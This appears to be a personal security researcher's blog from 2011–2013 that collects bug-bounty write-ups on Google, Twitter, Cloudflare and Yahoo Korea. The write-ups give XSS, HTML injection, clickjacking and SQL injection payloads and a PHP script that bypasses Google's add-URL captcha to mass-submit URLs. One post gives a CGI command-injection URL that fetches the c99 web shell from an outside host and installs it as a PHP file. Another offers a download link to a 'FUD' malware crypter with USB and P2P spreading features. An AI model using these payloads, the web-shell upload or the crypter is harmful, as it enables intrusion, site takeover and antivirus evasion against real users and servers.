Change OAuth Target URL & Domain Description [ UI redress attack ]

May 10, 2013

I forgot to blog about my another Google bug.  Now a days i am got busy in my start up project ! I hope so i will back soon on bug bounty will have some god blog out ! :)

To Change OAuth Target URL & Domain Description Can be achieved using Clickjacking Vulnerability . Click Jacking is commonly know as OWASP Top 10 Vulnerability.

Status: Fixed

OAuth is cool and simple to understand developer can integrate with Google ‘s OAuth endpoints seamlessly and effortlessly . Google Provider a Panel to manage the Return URL & Domain Description by using following URL.

Vulnerable URL : https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com

On the page there two input box called as Target URL path prefix: & Domain description: where use submit Domain & description information.

As Shown in the following Image :

Change OAuth Domain & Description

POC : < i f r a m e s r c = “https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com” width=”600″ height=”600″> // Not actual POC

Header Information :

As you can see missing Header information in the below Header Information

Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Special thanks to Google Security Team & G4H(garage4hackers.com) Team ..

We Provide Penetration Testing

I am Listed in Twitter Security Page

February 7, 2012

Thank you twitter and specially BOB from twitter who was always in touch for solving twitter vulnerability which was reported by me.
Thank you twitter to start this kind of program to encourage Information Security Researcher ./.

Here Link :

https://twitter.com/about/security

 

PIC :

We Provide Penetration Testing

Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection

January 5, 2012

————————
0x1 Title: Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection Vulnerability
0x2 Script Link: https://mobile.twitter.com/settings
0x3 Author: Sandeep kamble
0x4 Reported: December 28 ,2011
0x5 Vulnerability Fix date : Jan 05 ,2012
0x6 Public Release: Jan 05 ,2012
0x7 Browser : FireFox , IE
0x8 OS : Win7 , Ubantu
——————————————————————–

Description of script:

Twitter providing features to protect the user privacy, using account setting you can protect your Tweets, you can change Username, you can change your password, and you can change your E-mail address.

Affected script URL:

URL #1: https://mobile.twitter.com/settings/screen_name
URL #2: https://mobile.twitter.com/settings/name

Vulnerability Description:

1) Cross Site Scripting Vulnerability ( Twitter mobile is infected User Side XSS as well as it was protected to click jacking ):

Cross-Site Scripting attack is type of injection, in which malicious java scripts are injected into the web sites dynamic page.

2) HTML Injection Vulnerability (Twitter mobile is infected User Side , one html injection was stored )

HTML Injection is a type of injection, in which malicious HTML Code injected into the web sites Pages.

Exploit Description + Proof of Concept:

URL #1: https://mobile.twitter.com/settings/name

Title #1: Stored HTML Injection Vulnerability

In the above URL there is one input box to change the name. The HTML code of the input box is following.

Image1

As the twitter allow only 20 Characters in the name filed.
If we try executing the malicious HTML Code then HTML code look like as follows

HTML Code : “>sandeep

Image2

Malicious HTML code successfully executed with correct syntax of input box. As following show the output of the above input box code execution.

image4

URL #2: https://mobile.twitter.com/settings/name
Title #2: Cross Site Scripting and HTML Injection Vulnerability

In the above URL there is one input box to change the user name. The html code of the input box is following.

image7

In the input box we can execute the JAVA script as well as html Code so that is vulnerable to Cross site scripting and HTML Code injection Vulnerability

JS : ” > < s cr i pt> a lert (document.domain)< / scrip t >

image9

Malicious JS code successfully executed with correct syntax of input box. As following show the output of the above input box code execution.

image100

Similarly we can execute HTML Code but it is not stored HTML Code Execution.

image5

Check Out Video Here

http://dl.dropbox.com/u/18007092/twitter.swf

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short perform input sensitization


Warm Regards,
Sandeep Kamble
www.sandeepkamble.com

We Provide Penetration Testing

http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability

October 17, 2011

0×1 Site : http://anti-virus.cloudflare.com
0x3 Author : Sandeep Kamble
0×4 Reported : October 12, 2011
0×6 Public Release : October 17 2011
0x7 Status: Fixed

Description :

Anti-virus.cloudflare.com is a service for avoiding spams .
This project to stop attacks and educate visitors with infected computers about how they can clean up their machines.

Affected Variable :
?b_src=

Exploit :
Executing Javascript using the vulnerable variable called as ?b_src= . This attack is commonly know as Cross Site Scripting (XSS)
Anti-virus.cloud + affected script having stored Xss attack which can used for the grabbing the cookies .

POC :

Screen Shot :

Cloud XSS


Countermeasure :

1) Determine whether HTML output includes input parameters
2) In short perform input sensitization

Conclusion

I like to thank the cloudflare Security Team for their quick responses to my reports.

We Provide Penetration Testing

RCE to shell upload [CGI]

September 27, 2011

Author: Sandeep Kamble
Released Date: September 9, 2010

Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept

information passed from the client as a replacement for the specified target.

Vulnerabilities:-

1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.

Example site:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995

Exploit:-
The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag “Input”. Each “Input” tag has a variable name associated with it. This is the variable name that forms the left hand side of the previously mentioned variable=value token. The contents of the variable forms the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the “INput” field. However if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the “Input”
data will pass the data directly to the interpreter. **

Example:-
http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|

Shell upload command:-

http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|

Shell:-

http://www.victem.com/newswire/uploadedimage.php

Conclusion:-

The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.

After shell upload you can try for more.I hope you find it useful , be safe !

We Provide Penetration Testing

XCrypt & USG 1.3 [FUD]

September 25, 2011

This Is Crypter with Universal Stub Generator 1.3 & USG is written in VB.net.
Its got Spread options, P2P, USB, & Startup
File Clone, Icon and File Info and then the other PE options u see listed, like add section, strip relocations, change entrypoint etc.

Make Your Stuff FUD

http://dl.dropbox.com/u/18007092/XCrypt%20%26%20USG%201.3.rar

We Provide Penetration Testing

Add URL to Google.com Captcha Bypass

September 12, 2011
This Captcha bypass allow to spammer to submit number (that May be more than
1000 Website) of websites to Google crawl by writing simple program in any
programming language.

Original link (With captcha):
www.google.com/addurl/?continue=/addurl

Bypass captcha link POC:  http://www.google.com/addurl?q=www.mysite.com&hl=&dqq=

If you execute the above URL in the browser
then it will add the new website to Google crawl database.

Following Program can be used to submit a large amount of website at a time.

PHP Code 

<?php
@if(isset($_POST)){
$part1 = "http://www.google.com/addurl?q=";
$part2 = "&hl=&dqq=";
$curl = curl_init("http://google.com");
curl_exec($curl);

$urls=$_POST["urls"];

$lines=explode("\n",$urls);
 
foreach($lines as $line)
{
    $new = str_replace(" ", "", $part1.$line.$part2);
    curl_setopt($curl,CURLOPT_URL,$new);
}}
echo "done.";
?>
<html>
<head>
<title>Google Add Urls</title>
</head>
<body>
<form>
<textarea name="urls" cols="20" rows="100"></textarea><br />
<input type="submit" value="add urls" />
</form>
</body>
</html>

This may be small Vulnerability but still we want google to most secure! So
please try to fix. Otherwise there will be no use of captcha .

Now Google Patched This vuln :) 

/peace

Sandeep k.
We Provide Penetration Testing

Yahoo Korea SQL XSS vulnerability

August 9, 2011

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea having Blog-shop which is one of the most famous sub domain in Korea .
A cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

It has Sql injection in the notice_read.html?key script . I was Successful for retrieving the yahoo users cookies from this SQL Injection by inserting JAVA-Script into the SQL Injection payload.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16’/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert(‘XSS HERE’);</script>,7,8,9,0,1,2,3,4,5,6,7–%20

Yahoo Koria XSS

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regard

Sandeep Kamble

We Provide Penetration Testing

About my blog & me

July 21, 2011

This is my personal blog , i am going to share my personal things which is related to IT security . I am going to share my all expreinces which is realted to Information technology .

Special thanks to Sahil Sir, Kalpesh Sir, Ayesha mam, shaista mam & my team :) and my friends Kishor , Lalit , Jitu ,Mug .

My Gmail : sandeepk.l337@gmail.com

We Provide Penetration Testing

Tags


We Provide Penetration Testing